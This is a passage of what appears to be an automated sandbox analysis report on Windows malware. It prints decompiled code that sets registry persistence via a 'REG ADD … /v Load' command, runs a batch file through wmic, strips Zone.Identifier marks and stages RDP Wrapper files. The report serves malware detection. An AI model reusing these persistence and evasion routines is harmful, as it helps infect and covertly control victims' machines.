						E00410C3E(E00405FEB(_v28), _t264);
						E0040373F( &_v16, _t254 + 0x4c); // executed
						_t167 = E0040357C(_t264, _t250, _t270, "\\"); // executed
						E00403447(_t167, _t270,  &_v16); // executed
						_t243 = _v16;
						E00405FEB(_v16);
						_t170 = CopyFileW(_v20,  *_t264, 0); // executed
						if(_t170 != 0) {
							E00403333(_t264, _t250, _t265);
							E00405A61(_t254 + 0x30, _t250, _t265);
							E004061F0( &_v40, _t250, _t264, _t264, _t243, _t243);
							_t265 =  &(_t265[4]);
							_t259 = _t254 + 0x10;
							E00412612(_t254, 0x80000001, _t254 + 0x10, 0xf003f, 0); // executed
							E004125DF(_t254, _t254 + 0x18,  &_v40, 3); // executed
							E00403148( &_v40);
							L5:
							if( *_t254 == _t179) {
								E00412612(_t254, 0x80000001, _t259, 0xf003f, _t179);
							}
							_t273 = _a12 - _t179;
							if(_a12 == _t179) {
								L11:
								__eflags = _a8;
								if(__eflags != 0) {
									__eflags = _a4;
									_t260 = _t254 + 0x20;
									_a12 = _t254 + 0x20;
									if(_a4 == 0) {
										E00403549(_t260,  &_v20);
									}
									E00403666(_t260,  &_a4); // executed
									E00405FEB(_a4);
									_t255 = E00401085(0x200);
									E0040102C(_t255, "cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /f /v Load /t REG_SZ /d \"", 0x68);
									_t108 = E00403666(_t260,  &_a4); // executed
									_t261 = E00401133( *_t108);
									E00405FEB(_a4);
									_t112 = E00403666(_a12,  &_a4); // executed
									_t74 =  &(_t255[0x68]); // 0x68
									E0040102C(_t74,  *_t112, _t261);
									E00405FEB(_a4);
									_t76 =  &(_t255[0x68]); // 0x68
									__eflags =  &(_t76[_t261]);
									E0040102C( &(_t76[_t261]), "\"", 2);
									WinExec(_t255, _t179); // executed
								}
								E004036F7( &_a4,  *((intOrPtr*)(_v24 + 0x20))); // executed
								_t94 = E004036F7( &_a12, L":Zone.Identifier"); // executed
								E00403447( &_a4, __eflags, _t94); // executed
								E00405FEB(_a12);
								DeleteFileW(_a4); // executed
								_t192 = _a4;
								_t179 = 1;
								__eflags = 1;
							} else {
								__imp__SHGetKnownFolderPath(_t179, _t179,  &_v32);
								E004036F7( &_v16, _v32);
								E0040357C( &_v16, _t250, _t273, L"\\programs.bat");
								E004036F7( &_v12, L"for /F \"usebackq tokens=*\" %%A in (\"");
								E0040357C(E0040357C(E0040357C( &_v12, _t250, _t273, _v16), _t250, _t273, L":start"), _t250, _t273, L"\") do %%A");
								_t130 = E00403666( &_v12,  &_v36);
								_t132 = E00403666( &_v16,  &_v28);
								E004133B6( *_t132,  *_t130, E00403373( &_v12));
								E00405FEB(_v28);
								E00405FEB(_v36);
								E00410C8A( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273);
								 *_t265 = L":ApplicationData";
								E0040357C( &_v28,  *((intOrPtr*)(_v24 + 0xc)), _t273,  &E00417570);
								E004036F7( &_a12, L"wmic process call create \'\"");
								_t263 = _v28;
								E0040357C(E0040357C( &_a12,  *((intOrPtr*)(_v24 + 0xc)), _t273, _t263),  *((intOrPtr*)(_v24 + 0xc)), _t273, L"\"\'");
								E0040357C( &_v16,  *((intOrPtr*)(_v24 + 0xc)), _t273, L":start");
								_t145 = E00403666( &_a12,  &_v28);
								_t147 = E00403666( &_v16,  &_v36);
								E004133B6( *_t147,  *_t145, E00403373( &_a12));
								E00405FEB(_v36);
								E00405FEB(_v28);
								_t179 = 0;
								_t152 = CopyFileW(_v20, _t263, 0);
								_t228 = _a12;
								if(_t152 != 0) {
									E00405FEB(_t228);
									_a12 = 0;
									E00405FEB(_t263);
									E00405FEB(_v12);
									_v12 = 0;
									E00405FEB(_v16);
									_t254 = _v24;
									goto L11;
								} else {
									E00405FEB(_t228);
									_a12 = 0;
									E00405FEB(_t263);
									E00405FEB(_v12);
									_t192 = _v16;
									_v12 = 0;
								}
							}
							E00405FEB(_t192);
						}
					}
				}
				E00405FEB(_v44);
				E00405FEB(_v20);
				return _t179;
			}



































                                  0x004126dc
                                  0x004126e5
                                  0x004126ea
                                  0x004126ed
                                  0x004126f4
                                  0x004126f5
                                  0x004126f8
                                  0x004126fd
                                  0x004126fe
                                  0x00412706
                                  0x0041270f
                                  0x00412714
                                  0x00412718
                                  0x004127dc
                                  0x004127dc
                                  0x00000000
                                  0x0041271e
                                  0x0041271e
                                  0x00412721
                                  0x00000000
                                  0x00412727
                                  0x00412727
                                  0x0041272d
                                  0x00412730
                                  0x00412738
                                  0x00412747
                                  0x00412753
                                  0x0041275f
                                  0x0041276a
                                  0x0041276f
                                  0x00412772
                                  0x0041277d
                                  0x00412785
                                  0x00412790
                                  0x0041279b
                                  0x004127a3
                                  0x004127a8
                                  0x004127ab
                                  0x004127bc
                                  0x004127cd
                                  0x004127d5
                                  0x004127df
                                  0x004127e1
                                  0x004127f1
                                  0x004127f1
                                  0x004127f6
                                  0x004127f9
                                  0x0041297c
                                  0x0041297c
                                  0x00412980
                                  0x00412986
                                  0x0041298a
                                  0x0041298d
                                  0x00412990
                                  0x00412998
                                  0x00412998
                                  0x004129a3
                                  0x004129ab
                                  0x004129bc
                                  0x004129c4
                                  0x004129d2
                                  0x004129e2
                                  0x004129e4
                                  0x004129f0
                                  0x004129f8
                                  0x004129fc
                                  0x00412a04
                                  0x00412a0b
                                  0x00412a0e
                                  0x00412a16
                                  0x00412a20
                                  0x00412a20
                                  0x00412a2f
                                  0x00412a3c
                                  0x00412a45
                                  0x00412a4d
                                  0x00412a55
                                  0x00412a5b
                                  0x00412a60
                                  0x00412a60
                                  0x004127ff
                                  0x0041280a
                                  0x00412816
                                  0x00412823
                                  0x00412830
                                  0x00412854
                                  0x00412860
                                  0x0041286e
                                  0x00412882
                                  0x0041288a
                                  0x00412892
                                  0x004128a0
                                  0x004128a8
                                  0x004128af
                                  0x004128bc
                                  0x004128c1
                                  0x004128d4
                                  0x004128dd
                                  0x004128e9
                                  0x004128f7
                                  0x0041290b
                                  0x00412914
                                  0x0041291c
                                  0x00412921
                                  0x00412928
                                  0x0041292e
                                  0x00412933
                                  0x00412957
                                  0x0041295e
                                  0x00412961
                                  0x00412969
                                  0x00412971
                                  0x00412974
                                  0x00412979
                                  0x00000000
                                  0x00412935
                                  0x00412935
                                  0x0041293c
                                  0x0041293f
                                  0x00412947
                                  0x0041294c
                                  0x0041294f
                                  0x0041294f
                                  0x00412933
                                  0x00412a61
                                  0x00412a61
                                  0x00412785
                                  0x00412721
                                  0x00412a69
                                  0x00412a71
                                  0x00412a7c

                                  APIs
                                    • Part of subcall function 004109A0: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,?VA,?,00412BF1,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,InitWindows), ref: 004109C1
                                    • Part of subcall function 00412514: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000,74A313FB,?,?,0041270B,?,?), ref: 00412534
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 00412612: RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412612: RegOpenKeyExW.KERNEL32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 004125DF: RegSetValueExW.KERNEL32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                  • SHGetKnownFolderPath.SHELL32(00417570,00000000,00000000,?), ref: 0041280A
                                  • CopyFileW.KERNEL32(?,?,00000000), ref: 00412928
                                    • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 00410CBB
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00410C3E: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 00410C44
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 00403447: lstrcatW.KERNEL32 ref: 00403477
                                  • WinExec.KERNEL32 ref: 00412A20
                                  • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,74A313FB,00000000), ref: 00412A55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryExecFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                  • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                  • API String ID: 1503101065-3574166584
                                  • Opcode ID: 6225df1192c8e899447a60778a8c710b64a72e34b1e6dc93e682aafba756cd9f
                                  • Instruction ID: 79257a46d42963d1d04969a5855fdaa00e68833498fbabbc424ca4f910327048
                                  • Opcode Fuzzy Hash: 6225df1192c8e899447a60778a8c710b64a72e34b1e6dc93e682aafba756cd9f
                                  • Instruction Fuzzy Hash: 1FA12F71A0050AABCB14EF61CC92DEE7B79EF44348B00442EF502772D2DF78AA55CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E5A3, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 121COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040E5A3(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr* _t11;
				void* _t14;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t25;
				void* _t33;
				void* _t42;
				intOrPtr _t43;
				void* _t67;
				intOrPtr _t71;
				void* _t80;

				_t67 = __edx;
				_push(__ecx);
				_push(__ecx);
				InitializeCriticalSection(0x55ad18);
				_t71 = 5;
				asm("xorps xmm0, xmm0");
				 *0x55ad68 = _t71;
				 *0x55ad60 = _t71;
				_t42 = 0x18;
				asm("movups [0x55ad30], xmm0");
				 *0x55ad40 = 0;
				asm("movups [0x55ad48], xmm0");
				 *0x55ad58 = 0;
				 *0x55ad64 = 0;
				_t11 = E00406099(_t42);
				_t82 = _t11;
				if(_t11 == 0) {
					_t43 = 0;
				} else {
					 *_t11 = _t71;
					_t1 = _t11 + 4; // 0x4
					_t43 = _t1;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
				}
				 *0x55ad5c = _t43;
				 *0x55ad74 = 0;
				 *0x55ad78 = 0; // executed
				E00403411(0x55ad40, _t67, L"TermService"); // executed
				E00403411(0x55ad4c, _t67, L"%ProgramFiles%"); // executed
				_t14 = E004036F7( &_v12, L"%windir%\\System32"); // executed
				_t68 = _t14;
				_t15 = E004032E6( &_v8, _t14, _t82); // executed
				E00403549(0x55ad58, _t15); // executed
				E00405FEB(_v8);
				_v8 = 0;
				E00405FEB(_v12);
				_t19 = E00411177(_v12);
				_t83 = _t19 - 1;
				if(_t19 != 1) {
					_t69 = 0x55ad4c;
					_t20 = E004032E6( &_v12, 0x55ad4c, __eflags);
					_t80 = 0x55ad50;
					E00403549(0x55ad50, _t20);
					E00405FEB(_v12);
				} else {
					E00403411(0x55ad4c, _t68, L"%ProgramW6432%"); // executed
					_t69 = 0x55ad4c;
					_t33 = E004032E6( &_v12, 0x55ad4c, _t83); // executed
					_t80 = 0x55ad50;
					E00403549(0x55ad50, _t33); // executed
					E00405FEB(_v12);
					E00403411(0x55ad4c, 0x55ad4c, L"%ProgramFiles%"); // executed
				}
				E0040357C(_t80, _t69, _t83, L"\\Microsoft DN1"); // executed
				E0040357C(0x55ad4c, _t69, _t83, L"\\Microsoft DN1"); // executed
				_t25 = E0040357C(0x55ad58, _t69, _t83, L"\\rfxvmt.dll"); // executed
				E00410C3E(_t25, _t80);
				E00403549(0x55ad54, _t80); // executed
				E0040357C(0x55ad54, _t69, _t83, L"\\rdpwrap.ini"); // executed
				E0040357C(_t80, _t69, _t83, L"\\sqlmap.dll"); // executed
				E0040357C(0x55ad4c, _t69, _t83, L"\\sqlmap.dll"); // executed
				return 0x55ad18;
			}

















                                  0x0040e5a3
                                  0x0040e5a6
                                  0x0040e5a7
                                  0x0040e5b0
                                  0x0040e5b8
                                  0x0040e5b9
                                  0x0040e5bc
                                  0x0040e5c4
                                  0x0040e5cc
                                  0x0040e5cd
                                  0x0040e5d4
                                  0x0040e5da
                                  0x0040e5e1
                                  0x0040e5e7
                                  0x0040e5ed
                                  0x0040e5f2
                                  0x0040e5f4
                                  0x0040e606
                                  0x0040e5f6
                                  0x0040e5f6
                                  0x0040e5f8
                                  0x0040e5f8
                                  0x0040e5ff
                                  0x0040e600
                                  0x0040e601
                                  0x0040e602
                                  0x0040e603
                                  0x0040e603
                                  0x0040e608
                                  0x0040e618
                                  0x0040e61e
                                  0x0040e624
                                  0x0040e636
                                  0x0040e643
                                  0x0040e648
                                  0x0040e64d
                                  0x0040e658
                                  0x0040e660
                                  0x0040e668
                                  0x0040e66b
                                  0x0040e670
                                  0x0040e675
                                  0x0040e678
                                  0x0040e6af
                                  0x0040e6b4
                                  0x0040e6b9
                                  0x0040e6c1
                                  0x0040e6c9
                                  0x0040e67a
                                  0x0040e681
                                  0x0040e686
                                  0x0040e68b
                                  0x0040e690
                                  0x0040e698
                                  0x0040e6a0
                                  0x0040e6a8
                                  0x0040e6a8
                                  0x0040e6d6
                                  0x0040e6de
                                  0x0040e6ed
                                  0x0040e6f4
                                  0x0040e701
                                  0x0040e70d
                                  0x0040e71a
                                  0x0040e722
                                  0x0040e730

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055AD18), ref: 0040E5B0
                                    • Part of subcall function 00406099: GetProcessHeap.KERNEL32(00000000,000000F4,00411996,?,74A313FB,00000000,00405B72), ref: 0040609C
                                    • Part of subcall function 00406099: HeapAlloc.KERNEL32(00000000), ref: 004060A3
                                    • Part of subcall function 004032E6: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403319
                                    • Part of subcall function 00403549: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040356E
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                  • String ID: %ProgramFiles%$%ProgramW6432%$%windir%\System32$TermService$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll
                                  • API String ID: 2811233055-3289620323
                                  • Opcode ID: 39239106dbb69af809a275f728310b66d98112eac81cc19e74a28374785dc611
                                  • Instruction ID: 6cb6bcb1a7122bfa5540acbacd22e5e8e3ff012f813de54f9fa316898c3517f8
                                  • Opcode Fuzzy Hash: 39239106dbb69af809a275f728310b66d98112eac81cc19e74a28374785dc611
                                  • Instruction Fuzzy Hash: 7F319130B0061467C718BF669C628AE2E79ABD8707710063FB5027B2E2DE7C8E45975E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E28, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			_entry_() {
				struct _STARTUPINFOA _v72;
				intOrPtr _t6;
				int _t11;
				intOrPtr _t15;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr _t20;

				_t16 = GetCommandLineA();
				_t6 =  *_t16;
				if(_t6 != 0x22) {
					while(1) {
						__eflags = _t6 - 0x20;
						if(_t6 <= 0x20) {
							break;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						_t6 =  *_t16;
					}
					L12:
					if(_t6 != 0) {
						__eflags = _t6 - 0x20;
						if(_t6 > 0x20) {
							goto L13;
						}
						_t16 = _t16 + 1;
						__eflags = _t16;
						L11:
						_t6 =  *_t16;
						goto L12;
					}
					L13:
					_t2 =  &(_v72.dwFlags);
					_v72.dwFlags = _v72.dwFlags & 0x00000000;
					GetStartupInfoA( &_v72);
					E00405EB6();
					E00405EE3(0x41c000, 0x41c030);
					GetModuleHandleA(0);
					_t11 = E004154EB( *_t2, 0x41c000, 0x41c000); // executed
					E00405ECB();
					ExitProcess(_t11);
				}
				_t18 = _t16 + 1;
				_t20 =  *_t18;
				if(_t20 == 0) {
					L5:
					_t1 = _t18 + 1; // 0x3
					_t14 =  !=  ? _t18 : _t1;
					_t16 =  !=  ? _t18 : _t1;
					goto L11;
				}
				_t15 = _t20;
				while(1) {
					_t20 = _t15;
					if(_t15 == 0x22) {
						goto L5;
					}
					_t18 = _t18 + 1;
					_t20 =  *_t18;
					_t15 = _t20;
					if(_t20 != 0) {
						continue;
					}
					goto L5;
				}
				goto L5;
			}










                                  0x00405e35
                                  0x00405e37
                                  0x00405e3b
                                  0x00405e65
                                  0x00405e65
                                  0x00405e67
                                  0x00000000
                                  0x00000000
                                  0x00405e62
                                  0x00405e62
                                  0x00405e63
                                  0x00405e63
                                  0x00405e72
                                  0x00405e74
                                  0x00405e6b
                                  0x00405e6d
                                  0x00000000
                                  0x00000000
                                  0x00405e6f
                                  0x00405e6f
                                  0x00405e70
                                  0x00405e70
                                  0x00000000
                                  0x00405e70
                                  0x00405e76
                                  0x00405e76
                                  0x00405e76
                                  0x00405e7e
                                  0x00405e84
                                  0x00405e93
                                  0x00405e9a
                                  0x00405ea2
                                  0x00405ea9
                                  0x00405eaf
                                  0x00405eaf
                                  0x00405e3d
                                  0x00405e3e
                                  0x00405e42
                                  0x00405e55
                                  0x00405e55
                                  0x00405e5b
                                  0x00405e5e
                                  0x00000000
                                  0x00405e5e
                                  0x00405e44
                                  0x00405e46
                                  0x00405e46
                                  0x00405e4a
                                  0x00000000
                                  0x00000000
                                  0x00405e4c
                                  0x00405e4d
                                  0x00405e4f
                                  0x00405e53
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405e53
                                  0x00000000

                                  APIs
                                  • GetCommandLineA.KERNEL32 ref: 00405E2F
                                  • GetStartupInfoA.KERNEL32 ref: 00405E7E
                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00405E9A
                                  • ExitProcess.KERNEL32 ref: 00405EAF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                  • String ID:
                                  • API String ID: 2164999147-0
                                  • Opcode ID: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction ID: 79012c7e925f986a536a85d8df8cd7193993c2d42f70a77d9956ba037c84b5bc
                                  • Opcode Fuzzy Hash: 03e413eae8a4ea63490194bdb283974b75a2e54e2929799594d1208bb41f8623
                                  • Instruction Fuzzy Hash: DE010434108A444ED7206B74D8863EB3FA6DB1A348B68107EE1C5A7382C63E0E478EDD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004134A2, Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E004134A2(CHAR* __ecx, signed int* __edx) {
				long _v8;
				void* _t5;
				long _t6;
				signed int _t7;
				void* _t11;
				signed int* _t18;
				void* _t22;

				_push(__ecx);
				_t18 = __edx;
				_t11 = E00401085(0x400000);
				_v8 = 0;
				_t5 = CreateFileA(__ecx, 0x80000000, 0, 0, 3, 0x80, 0); // executed
				_t22 = _t5;
				if(_t22 == 0xffffffff) {
					 *_t18 =  *_t18 & 0x00000000;
				}
				_t6 = GetFileSize(_t22, 0);
				 *_t18 = _t6;
				_t7 = ReadFile(_t22, _t11, _t6,  &_v8, 0); // executed
				if(_t7 == 0) {
					 *_t18 =  *_t18 & _t7;
				}
				CloseHandle(_t22); // executed
				return _t11;
			}










                                  0x004134a5
                                  0x004134ae
                                  0x004134b8
                                  0x004134cc
                                  0x004134cf
                                  0x004134d5
                                  0x004134da
                                  0x004134dc
                                  0x004134dc
                                  0x004134e2
                                  0x004134ed
                                  0x004134f3
                                  0x004134fb
                                  0x004134fd
                                  0x004134fd
                                  0x00413500
                                  0x0041350c

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                  • CloseHandle.KERNEL32(00000000), ref: 00413500
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                  • String ID:
                                  • API String ID: 2517252058-0
                                  • Opcode ID: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction ID: aa115e6f790b4d38b1fbeae35b29bc5e12f96e584a277f2799dc653a56db372b
                                  • Opcode Fuzzy Hash: acc67c7317e70eea7451c17902bc0e4f69181cd995ee4df2eb362c61f509b136
                                  • Instruction Fuzzy Hash: E1F0AFB2605210BFE3215B35AC09FFB76ACDB54725F204135FA41E62C0EBB45E0086A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041111B, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041111B() {
				void* _v8;
				long _v12;
				void _v16;
				long _t21;
				void* _t22;

				_t22 = 0;
				_v8 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
					_t21 = 4;
					_v12 = _t21;
					GetTokenInformation(_v8, 0x14,  &_v16, _t21,  &_v12); // executed
					_t22 =  !=  ? _v16 : 0;
				}
				if(_v8 != 0) {
					CloseHandle(_v8); // executed
				}
				return 0 | _t22 != 0x00000000;
			}








                                  0x00411125
                                  0x0041112a
                                  0x0041113c
                                  0x00411140
                                  0x00411144
                                  0x00411152
                                  0x0041115a
                                  0x0041115a
                                  0x00411162
                                  0x00411167
                                  0x00411167
                                  0x00411176

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,74A313FB,00000000,74A313FB,00000000,?,?,?,?,0041563F,?), ref: 0041112D
                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0041563F,?), ref: 00411134
                                  • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0041563F,?), ref: 00411152
                                  • CloseHandle.KERNEL32(00000000), ref: 00411167
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                  • String ID:
                                  • API String ID: 215268677-0
                                  • Opcode ID: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction ID: 0771c0d2f46ea20c01bd2ae64a6620b8b7ded6cbafb58bfe859f8e00c08c725d
                                  • Opcode Fuzzy Hash: e114797ed7bb71c60c3d08b110eba96b8ccbcffbddbf2284c9e0a1db07d94dea
                                  • Instruction Fuzzy Hash: 87F0F971E00218FBDB119BA0DD09BDEBBB8EF08751F118065EA01E61A0D7709F84DAA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412612, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412612(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || E00410C50(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E00412554(_t23);
					goto L4;
				}
			}






                                  0x00412619
                                  0x0041261c
                                  0x00412622
                                  0x00412657
                                  0x00412661
                                  0x00412669
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412632
                                  0x00412635
                                  0x0041264e
                                  0x0041266e
                                  0x00000000
                                  0x0041266e
                                  0x00412652
                                  0x00000000
                                  0x00412652

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 00410C50: RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,00020019,00000000,74A313FB,?,0041262E,?,?,?VA,?,00412B64,80000001,?,000F003F), ref: 00410C66
                                  • RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412554: RegCloseKey.KERNEL32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open$CloseCreate
                                  • String ID: ?VA
                                  • API String ID: 1752019758-1028452459
                                  • Opcode ID: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction ID: 4932445430126be2ff0c3f65702f86cceb6eb04fd32848aa65fa8fc0dd82d40c
                                  • Opcode Fuzzy Hash: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction Fuzzy Hash: 5A01197120020EBFAB119F62DE84DFB7B6EEF44398B10402AF905D1250E7B5CDA19AB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405B4E, Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 158sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405B4E(char __ecx, void* __edx, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v76;
				char _v100;
				char _v108;
				char _v148;
				void* _t89;
				void* _t100;
				void* _t104;
				void* _t108;
				void* _t112;
				intOrPtr* _t134;
				char _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				intOrPtr _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				void* _t197;

				_t197 = __eflags;
				_t183 = __ecx;
				_v8 = __ecx;
				Sleep(0x1f4); // executed
				E0041196E( &_v100, _t197);
				E00411865( &_v100, E00413323( &_v100)); // executed
				_t89 = E004034D1( &_v12, ".bss"); // executed
				E004117D8( &_v100,  &_v148, _t89); // executed
				E00405FEB(_v12);
				E0040315E( &_v16,  &_v108);
				E00402FCE(_t183 + 0x4c,  &_v16);
				E00403148( &_v16);
				E00405AAE(_t183,  &_v24);
				_t134 = _v24;
				_t192 =  *_t134;
				_t100 = E00413441(_t134 + 4, _t192); // executed
				E00403549(_t183 + 0x10, _t100); // executed
				E00405FEB(_v12);
				_t19 =  &_v8; // 0x41562e
				_t20 = _t192 + 4; // 0x74a313ff
				_t184 = _t20;
				 *((intOrPtr*)( *_t19 + 0x14)) =  *((intOrPtr*)(_t134 + _t184));
				_t193 =  *((intOrPtr*)(_t134 + _t184 + 4));
				_t185 = _t184 + 8;
				_t104 = E00413441(_t134 + _t185, _t193);
				_t27 =  &_v8; // 0x41562e
				E00403549( *_t27 + 0x28, _t104);
				E00405FEB(_v12);
				_t30 =  &_v8; // 0x41562e
				_t186 = _t185 + _t193;
				 *((intOrPtr*)( *_t30 + 0x18)) =  *((char*)(_t134 + _t186));
				_t194 =  *((intOrPtr*)(_t134 + _t186 + 1));
				_t187 = _t186 + 5;
				_t108 = E00413441(_t134 + _t187, _t194); // executed
				_t37 =  &_v8; // 0x41562e
				E00403549( *_t37 + 0x1c, _t108); // executed
				E00405FEB(_v12);
				_t40 =  &_v8; // 0x41562e
				_t188 = _t187 + _t194;
